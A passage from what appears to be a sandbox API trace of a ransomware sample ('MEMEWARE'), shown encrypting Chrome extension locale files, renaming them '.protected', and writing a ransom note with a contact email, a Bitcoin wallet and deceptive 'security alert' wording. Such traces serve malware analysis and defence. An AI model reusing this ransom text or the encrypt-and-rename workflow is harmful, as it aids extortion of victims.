Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json") returned 155 [0081.347] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json") returned 155 [0081.347] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json") returned 155 [0081.347] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.347] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x124, lpOverlapped=0x0) returned 1 [0081.348] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffedc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.349] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x124, lpOverlapped=0x0) returned 1 [0081.349] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.349] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.349] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.349] CloseHandle (hObject=0x168) returned 1 [0081.349] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json.protected") returned 165 [0081.349] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json.protected")) returned 1 [0081.350] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.350] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.350] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\RESTORE_FILES.txt") returned 159 [0081.350] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.351] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.351] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.352] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.352] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.352] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.352] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.352] CloseHandle (hObject=0x164) returned 1 [0081.352] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.352] lstrcmpiW (lpString1="ca", lpString2="Windows") returned -1 [0081.352] lstrcmpiW (lpString1="ca", lpString2="Program Files") returned -1 [0081.352] lstrcmpiW (lpString1="ca", lpString2="Program Files (x86)") returned -1 [0081.352] lstrcmpiW (lpString1="ca", lpString2="$Recycle.bin") returned 1 [0081.352] lstrcmpiW (lpString1="ca", lpString2="System Volume Information") returned -1 [0081.352] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca") returned 141 [0081.352] lstrcmpW (lpString1="ca", lpString2=".") returned 1 [0081.352] lstrcmpW (lpString1="ca", lpString2="..") returned 1 [0081.352] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\*") returned 143 [0081.352] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.353] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.353] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.353] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.353] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.353] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.353] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\.") returned 143 [0081.353] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.354] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.354] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.354] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.354] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.354] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.354] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.354] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\..") returned 144 [0081.354] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.354] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.354] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.354] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.354] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.354] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.354] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.354] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.354] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json") returned 155 [0081.354] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.354] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.354] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.354] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.354] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.356] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json") returned 155 [0081.356] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.356] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json") returned 155 [0081.356] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.356] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json") returned 155 [0081.356] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.356] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xfe, lpOverlapped=0x0) returned 1 [0081.357] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff02, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.357] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xfe, lpOverlapped=0x0) returned 1 [0081.357] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.357] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.358] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.358] CloseHandle (hObject=0x168) returned 1 [0081.358] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json.protected") returned 165 [0081.358] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json.protected")) returned 1 [0081.359] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.359] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.359] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\RESTORE_FILES.txt") returned 159 [0081.359] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.359] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.359] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.360] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.360] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.360] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.360] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.360] CloseHandle (hObject=0x164) returned 1 [0081.361] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.361] lstrcmpiW (lpString1="cs", lpString2="Windows") returned -1 [0081.361] lstrcmpiW (lpString1="cs", lpString2="Program Files") returned -1 [0081.361] lstrcmpiW (lpString1="cs", lpString2="Program Files (x86)") returned -1 [0081.361] lstrcmpiW (lpString1="cs", lpString2="$Recycle.bin") returned 1 [0081.361] lstrcmpiW (lpString1="cs", lpString2="System Volume Information") returned -1 [0081.361] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs") returned 141 [0081.361] lstrcmpW (lpString1="cs", lpString2=".") returned 1 [0081.361] lstrcmpW (lpString1="cs", lpString2="..") returned 1 [0081.361] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\*") returned 143 [0081.361] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.362] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.362] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.362] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.362] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.362] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.362] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\.") returned 143 [0081.362] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.362] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.362] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.362] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.362] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.362] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.362] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.362] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\..") returned 144 [0081.362] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.362] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.362] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.362] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.362] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.362] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.362] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.363] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.363] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json") returned 155 [0081.363] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.363] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.363] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.363] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.363] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.364] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json") returned 155 [0081.364] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.364] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json") returned 155 [0081.364] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.364] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 